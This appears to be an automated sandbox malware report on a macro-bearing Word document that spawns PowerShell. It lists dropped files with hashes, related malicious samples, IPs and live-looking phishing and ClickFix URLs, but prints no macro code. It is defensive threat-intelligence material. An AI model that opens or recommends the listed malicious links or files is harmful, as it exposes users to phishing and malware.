                                                        • Excluded domains from analysis (whitelisted): odc.officeapps.live.com, res-2.cdn.office.net, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, templatesmetadata.office.net.edgekey.net, eus2-azsc-000.roaming.officeapps.live.com, osiprod-eus2-buff-azsc-000.eastus2.cloudapp.azure.com, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, cdn-office.azureedge.net, login.live.com, officeclient.microsoft.com, templatesmetadata.office.net, c.pki.goog, ecs.office.com, client.wns.windows.com, prod.configsvc1.live.com.akadns.net, fd.api.iris.microsoft.com, frc-azsc-000.odc.officeapps.live.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, cdn-office.ec.azureedge.net, us1.roaming1.live.com.akadns.net, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, x1.c.lencr.org, nleditor.osi.office.net, e26769.dscb.akamaiedge.net, res-prod.trafficmanager.net, prod-eu-resolver.naturallanguageeditorservice.osi.office.net.aka
                                                        • Execution Graph export aborted for target powershell.exe, PID 7996 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                        • Report size getting too big, too many NtSetValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        00:07:15API Interceptor1264x Sleep call for process: powershell.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        No context

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        sni1gl.wpc.sigmacdn.netWRD1792.docx.docGet hashmaliciousDynamerBrowse
                                                        • 152.199.21.175
                                                        tftpd64.exeGet hashmaliciousUnknownBrowse
                                                        • 152.199.21.175
                                                        SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                        • 152.199.21.175
                                                        invoice.docmGet hashmaliciousMetasploitBrowse
                                                        • 152.199.21.175
                                                        Ball - Temp.data for GCMs.docGet hashmaliciousHTMLPhisherBrowse
                                                        • 152.199.21.175
                                                        Order_948575494759.xlsGet hashmaliciousUnknownBrowse
                                                        • 152.199.21.175
                                                        index.html.docxGet hashmaliciousUnknownBrowse
                                                        • 152.199.21.175
                                                        https://syndiclair-my.sharepoint.com/:o:/g/personal/ml_syndiclair_fr/En8EbZMYpZ5CodZQ05mt4IMBGZHEHcSylnIeMh0DoULmZw?e=UkXb4YGet hashmaliciousUnknownBrowse
                                                        • 152.199.21.175
                                                        https://1drv.ms/w/c/17cc1e7b64547fa0/ER4uyAUCto9GkfZ_Sw-4_NAB9TeJj_jWV9oRzb3kdQINFQ?e=4%3aaVtPRh&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                                        • 152.199.21.175
                                                        174 Power Global_Enrollment_.docx.docGet hashmaliciousUnknownBrowse
                                                        • 152.199.21.175

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        NAMECHEAP-NETUSPayment Receipt.exeGet hashmaliciousFormBookBrowse
                                                        • 199.192.21.169
                                                        http://keywestlending.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                        • 104.219.248.99
                                                        inv#12180.exeGet hashmaliciousFormBookBrowse
                                                        • 199.192.21.169
                                                        loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                        • 37.61.233.171
                                                        https://webmail.buzja.com/?auth=byoungjo.yoo@hyundaimovex.comGet hashmaliciousHTMLPhisherBrowse
                                                        • 198.54.116.86
                                                        SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.236.169
                                                        Laurier Partners Proposal.emlGet hashmaliciousHTMLPhisherBrowse
                                                        • 199.188.207.168
                                                        https://supercrete.lk/m/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 199.188.200.142
                                                        http://jonotarmot.com/dcs/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 198.54.120.20

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):9434
                                                        Entropy (8bit):4.93135987101331
                                                        Encrypted:false
                                                        SSDEEP:192:Mxoe5ZpOUxoe5Eib4+Vsm5emd1gkjDt4iWN3yBGHV9smkdcU6CKdcU6Cs9smnpOu:uAib4+ykjh4iUxUtY7ib4e
                                                        MD5:D84C4876DBEC0BB4311069E5B8D21EF3
                                                        SHA1:F1364C57CDBDF3AF34CC3F01E23BE33D85C6C959
                                                        SHA-256:B2BE73589C2723771C9C8C5F03DC51165C64C8C0C1A7AD568B2A4ADB988E74D9
                                                        SHA-512:812EE5BAC16837C28C29C2200CF15B19EBF1741EB2DF0940E52BB5603C32377D5B7A585E1D00EE6B08186043E2AB5586A466275426F3F8374DB6DF0ED2181A27
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:PSMODULECACHE.......X../..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........r.z../..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1204
                                                        Entropy (8bit):5.327349596130257
                                                        Encrypted:false
                                                        SSDEEP:24:3UDjgcP9wjGo4KCcMRPtLgP7KcgoSM9tdL4tTiK+7PrK90lh9R:SccP9Sn4LRBgjnSM9tdL4tTiJPuchD
                                                        MD5:5108554D86A895205A94FA0ECC81C3DC
                                                        SHA1:EC109FAC3C996FFCCED1E0BC8A37A19261F2B2BF
                                                        SHA-256:BE8B9734830766827C04E60E6022E2B77DF055302E78D6B60F3C3266C755B68F
                                                        SHA-512:7F77E22E20CAFDBC30D41317F82F1643628FBDE25C9810034179A381DA223251DA4AB401866D130CAC4C62DEB0C02BADD706422EAAE7EEE8C5D488C8E063459F
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:@...e................................................@..........8...................c.O..O.4+m.........System.Numerics.H.....................C...}...>...... .Microsoft.PowerShell.ConsoleHost0...............P!..:..A..............System..4...............s...<.O.h....rv........System.Core.D.................`....A..R............System.Management.AutomationL.................G(*.OK.w..h..*......#.Microsoft.Management.Infrastructure.4...............F.I..^.M._. ..}........System.Xml..<.................&cb.1B.u`.)...........System.Configuration<...................g..C.&..3.e.........System.Management...@...............l...52O.Rt...%.........System.DirectoryServices4...............Y.].s.N.....P........System.Data.H.................R....G.&'Hx-.P........Microsoft.PowerShell.Security...<...............Y.O.;b.D..8IJ...........System.Transactions.P.................u 6Z.L....A.X;......%.Microsoft.PowerShell.Commands.Utility...D...............c\....RG.5..q./........System.Configuration.Ins

                                                        C:\Users\user\AppData\Local\Temp\D6D2500E.tmp

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1758
                                                        Entropy (8bit):2.6946609091905285
                                                        Encrypted:false
                                                        SSDEEP:48:m8/WKGKLsOdpep4TB4MmmEtK0Ial11pnv5kyTzi:lQOdracqJB5C
                                                        MD5:4AF9AFE668DAAF062A82275BF38584A0
                                                        SHA1:A95D4262B276B95047CA08FE5A0DCFD4387C6DA6
                                                        SHA-256:5307DC1679D6001633CD5AB5AF6D8039CD56CB18451ED743C51D8D7445774644
                                                        SHA-512:0E2E578430DBC95AA4422D674C017B812EFE5A2DDA27D19087D69549D9B4BD8AE8EC4B1655234C99A02A166B3D30B18EA951D4090E1B0F35C643828DC214C49A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:1.0.7.,.3.7.4.6.3.7.6.,.1.2.3.,.7.7.8.7.0.2.2.2.4.,.6.3.6.4.3.3.4.,.1.4.6.1.9.5.4.,.2.6.0.1.,.1.1.9.,.3.7.4.6.3.7.2.,.1.5.6.1.9.5.8.,.3.7.4.6.2.5.9.,.1.1.9.6.3.7.8.,.3.7.4.6.3.6.8.,.4.2.1.4.2.1.7.,.6.3.6.4.3.3.1.,.1.2.5.,.1.5.6.1.9.5.5.,.7.7.8.7.0.2.2.2.5.,.4.8.0.9.1.5.7.6.3.,.3.7.4.6.3.7.3.,.4.8.0.9.1.5.7.6.5.,.7.7.8.7.0.2.2.3.4.,.1.2.2.3.4.3.4.,.5.2.1.6.4.2.,.4.8.0.9.1.5.7.6.4.,.7.2.9.1.8.1.0.4.3.,.6.3.6.4.3.3.2.,.1.4.6.1.9.5.5.,.1.2.8.,.1.0.0.,.1.0.1.,.1.0.3.,.1.0.4.,.1.0.5.,.1.0.6.,.1.0.8.,.1.0.9.,.1.1.2.,.1.1.4.,.1.1.8.,.1.2.0.,.1.2.1.,.1.2.2.,.5.4.5.6.5.4.3.,.1.2.4.,.6.5.4.2.1.8.5.1.,.1.2.6.,.1.2.2.0.7.7.9.,.;.1.0.3.4.5.0.2.0.,.3.,.1.0.6.9.5.5.3.,.1.6.5.7.4.5.3.,.6.5.4.0.2.1.5.,.1.2.7.,.1.6.5.7.4.5.2.,.7.4.5.3.4.5.9.,.2.3.7.1.6.5.1.,.3.2.9.4.5.8.7.9.9.,.3.0.1.2.3.4.6.6.,.3.1.4.1.5.9.1.5.,.3.0.1.5.3.7.2.1.,.2.7.1.5.3.4.9.7.,.3.7.4.6.3.7.9.,.6.3.7.1.6.9.4.,.1.0.3.4.5.0.2.1.,.1.0.6.9.5.3.3.,.3.4.4.1.3.9.5.3.,.6.3.6.4.3.3.7.,.2.6.4.8.5.7.8.4.,.6.1.7.0.7.3.0.7.,.2.5.4.8.7.8.5.4.,.6.7.

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1d1kgjoj.nwj.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_to15cnbz.roq.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzgvokui.a3g.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zygjm2zi.ujs.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\~DF80FE763F162D8AB6.TMP

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\~DF94C6AA780A24EE87.TMP

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\~DFD6253C75CD58942C.TMP

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6221
                                                        Entropy (8bit):3.7488911705248857
                                                        Encrypted:false
                                                        SSDEEP:48:JjEsU9CK2Uuehj4wwukvhkvklCywhekcForo31XSogZoihEcForo35XSogZoi1+:l/8CQZh3kvhkvCCtWFMtHpFMJHA
                                                        MD5:4C07C301E495044A1FC4408FD23C2F33
                                                        SHA1:9B3E7627ADEC9995C71C3ED591B3CC7E5B8FDD81
                                                        SHA-256:E92BB367476A85AE6A2442CA3FAE3E0C7E684CAECCA52B44674B52CCD7BD653A
                                                        SHA-512:681CBEAEB8F3DB03FFA67787B2A251E712CD005E98078F8D700765873F664158B3BC712B11C7ADF667A65E330A33E9C8FB4AB44FC7009393D3E8A7655F57EA43
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ...]...eJ... ..LJ.....t.a............................:..IG..Yr?.D..U..k0.&...&......p...eJ......._......._......t...CFSF..1......Y....AppData...t.Y^...H.g.3..(.....gVA.G..k...@......Y..&Z.(..............................A.p.p.D.a.t.a...B.V.1.....&Z.(..Roaming.@......Y..&Z.(..........................:.y.R.o.a.m.i.n.g.....\.1.....&Z.(..MICROS~1..D......Y..&Z.(..........................T...M.i.c.r.o.s.o.f.t.....V.1......Y-...Windows.@......Y..&Z.(...........................g..W.i.n.d.o.w.s.......1......Y....STARTM~1..n......Y...Y.....................D.....ZEr.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......Y...Y.....................@......b..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......TA-..WINDOW~1..V......Y...YYy..........................|iF.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......T.* .WINDOW~1.LNK..^......Y...Y.y................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ALW6Q9PF9MXG7ZVFMMY8.temp

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6221
                                                        Entropy (8bit):3.7488911705248857
                                                        Encrypted:false
                                                        SSDEEP:48:JjEsU9CK2Uuehj4wwukvhkvklCywhekcForo31XSogZoihEcForo35XSogZoi1+:l/8CQZh3kvhkvCCtWFMtHpFMJHA
                                                        MD5:4C07C301E495044A1FC4408FD23C2F33
                                                        SHA1:9B3E7627ADEC9995C71C3ED591B3CC7E5B8FDD81
                                                        SHA-256:E92BB367476A85AE6A2442CA3FAE3E0C7E684CAECCA52B44674B52CCD7BD653A
                                                        SHA-512:681CBEAEB8F3DB03FFA67787B2A251E712CD005E98078F8D700765873F664158B3BC712B11C7ADF667A65E330A33E9C8FB4AB44FC7009393D3E8A7655F57EA43
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ...]...eJ... ..LJ.....t.a............................:..IG..Yr?.D..U..k0.&...&......p...eJ......._......._......t...CFSF..1......Y....AppData...t.Y^...H.g.3..(.....gVA.G..k...@......Y..&Z.(..............................A.p.p.D.a.t.a...B.V.1.....&Z.(..Roaming.@......Y..&Z.(..........................:.y.R.o.a.m.i.n.g.....\.1.....&Z.(..MICROS~1..D......Y..&Z.(..........................T...M.i.c.r.o.s.o.f.t.....V.1......Y-...Windows.@......Y..&Z.(...........................g..W.i.n.d.o.w.s.......1......Y....STARTM~1..n......Y...Y.....................D.....ZEr.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......Y...Y.....................@......b..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......TA-..WINDOW~1..V......Y...YYy..........................|iF.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......T.* .WINDOW~1.LNK..^......Y...Y.y................

                                                        C:\Users\user\Desktop\DUD6CqQ1Uj.doc (copy)

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Tiago Oliveira, Template: Normal, Last Saved By: user, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 28 01:44:00 2023, Last Saved Time/Date: Mon Jan 6 05:07:00 2025, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0
                                                        Category:dropped
                                                        Size (bytes):31744
                                                        Entropy (8bit):4.178602493534855
                                                        Encrypted:false
                                                        SSDEEP:384:wwm3s8iSwvxjk+tDZPst7fDkl8OOFV/gVAd:fMSxw+ttCfDg8BFgs
                                                        MD5:DA9D559A420E8654C06996910594F2F4
                                                        SHA1:C1B973C1DBD76B0F69EC807DE1B4FA65D4C41EF5
                                                        SHA-256:0BC7DD217CBE4FBE7FEFE5B9C2E8BC7FA4046B51A3EF467FEB3E3ED4AC78A879
                                                        SHA-512:ED0B31379119C7361C4ED98F86D394A9F80B3FD17F4D09AB9204E01023B043961656079C46C9D092EB0A9AC2EB3230137FBF71973B2F222376E9113202ED2F91
                                                        Malicious:true
                                                        Preview:......................>.......................'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................k.. ..........................bjbj..............................,j.,j..................................................................................F.......F...........................................................................................................9...t...................................................................7...............................................................c...P.........................................................................

                                                        C:\Users\user\Desktop\~$D6CqQ1Uj.doc

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):2.280616152050036
                                                        Encrypted:false
                                                        SSDEEP:3:blRmMf64Z+/lTVlltPlcX8DdhxKn:bzmMi4Q5llMswn
                                                        MD5:F14EAB2CF7F8451E929708C5FCD0BF33
                                                        SHA1:3B37B538528BCCDF8EAC3443790A9763886D63A0
                                                        SHA-256:8FB42E3A4BD311F26708A08C49F4B670ADD7B4A617490F9BD1EA85830144D61B
                                                        SHA-512:BF727E680A3A3F3AFD4FC3B9011A6E67FF0DF6AC5A1E198E5CB62901F3137397DB0C401CC0D861632A22EAA0581A6D336E802DE220AED0D42AC2CFA8ECB73849
                                                        Malicious:false
                                                        Preview:.user..................................................M.a.o.g.a.......i8....p7O.............8n.2.....................................ja.....................6.M2

                                                        C:\Users\user\Desktop\~WRD0000.tmp

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Tiago Oliveira, Template: Normal, Last Saved By: user, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 28 01:44:00 2023, Last Saved Time/Date: Mon Jan 6 05:07:00 2025, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0
                                                        Category:dropped
                                                        Size (bytes):31744
                                                        Entropy (8bit):4.178602493534855
                                                        Encrypted:false
                                                        SSDEEP:384:wwm3s8iSwvxjk+tDZPst7fDkl8OOFV/gVAd:fMSxw+ttCfDg8BFgs
                                                        MD5:DA9D559A420E8654C06996910594F2F4
                                                        SHA1:C1B973C1DBD76B0F69EC807DE1B4FA65D4C41EF5
                                                        SHA-256:0BC7DD217CBE4FBE7FEFE5B9C2E8BC7FA4046B51A3EF467FEB3E3ED4AC78A879
                                                        SHA-512:ED0B31379119C7361C4ED98F86D394A9F80B3FD17F4D09AB9204E01023B043961656079C46C9D092EB0A9AC2EB3230137FBF71973B2F222376E9113202ED2F91
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:......................>.......................'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................k.. ..........................bjbj..............................,j.,j..................................................................................F.......F...........................................................................................................9...t...................................................................7...............................................................c...P.........................................................................

                                                        C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        Static File Info

                                                        General

                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1200, Author: Tiago Ol, Number of Characters: 0, Create Time/Date: Tue Feb 28 04:44:00 2023, Last Saved By: Tiago Ol, Last Saved Time/Date: Tue Feb 28 05:12:00 2023, Name of Creating Application: Microsoft O, Number of Pages: 1, Revision Number: 4, Security: 0, Template: Normal, Number of Words: 0
                                                        Entropy (8bit):4.428735214508121
                                                        TrID:
                                                        • Microsoft Word document (32009/1) 54.23%
                                                        • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                        • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                        File name:DUD6CqQ1Uj.doc
                                                        File size:19'968 bytes
                                                        MD5:4fd8d5da5cd2109c730052735c9ccbb6
                                                        SHA1:2d175610936cdfc27380c13d89f5883db532d2b2
                                                        SHA256:9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb
                                                        SHA512:b4c148540e3af0ebc2ce8107daed1bc19585910f7509ee70f53bbe2c500cce057e45effe9e957f2dfb1392a86dc8ccbb09207b919bbb200f5285cedb5ee399a5
                                                        SSDEEP:192:PrRYrYol7GbIklKjOOkx8V/gVYxTZ+NxImB3w4ppBVltjOuuuudw83Z+f:+fDkl8OOFV/gVAdItODpe
                                                        TLSH:E092E610FB99D91AF4A665744923C184BB78BC9C5911834B734CFF6DFC306B44AA1B1A
                                                        File Content Preview:........................!.......................!...........................%..................................................................................................................................................................................

                                                        File Icon

                                                        Icon Hash:35e1cc889a8a8599

                                                        Static OLE Info

                                                        General

                                                        Document Type:OLE
                                                        Number of OLE Files:1

                                                        OLE File "DUD6CqQ1Uj.doc"

                                                        Indicators
                                                        Has Summary Info:
                                                        Application Name:Microsoft Office Word
                                                        Encrypted Document:False
                                                        Contains Word Document Stream:True
                                                        Contains Workbook/Book Stream:False
                                                        Contains PowerPoint Document Stream:False
                                                        Contains Visio Document Stream:False
                                                        Contains ObjectPool Stream:False
                                                        Flash Objects Count:0
                                                        Contains VBA Macros:True
                                                        Summary
                                                        Code Page:1200
                                                        Title:
                                                        Subject:
                                                        Author:Tiago Oliveira
                                                        Keywords:
                                                        Comments:
                                                        Template:Normal.dotm
                                                        Last Saved By:Tiago Oliveira
                                                        Revion Number:4
                                                        Total Edit Time:0
                                                        Last Printed:1601-01-01 00:00:00
                                                        Create Time:2023-03-31 04:44:00
                                                        Last Saved Time:2023-03-31 05:12:00
                                                        Number of Pages:1
                                                        Number of Words:0
                                                        Number of Characters:0
                                                        Creating Application:Microsoft Office Word
                                                        Security:0
                                                        Document Summary
                                                        Document Code Page:1200
                                                        Number of Lines:0
                                                        Number of Paragraphs:0
                                                        Thumbnail Scaling Desired:False
                                                        Company:
                                                        Contains Dirty Links:False
                                                        Application Version:1048576

                                                        Streams with VBA

                                                        VBA File Name: NewModule.bas, Stream Size: 6886
                                                        General
                                                        Stream Path:Macros/VBA/NewModule
                                                        VBA File Name:NewModule.bas
                                                        Stream Size:6886
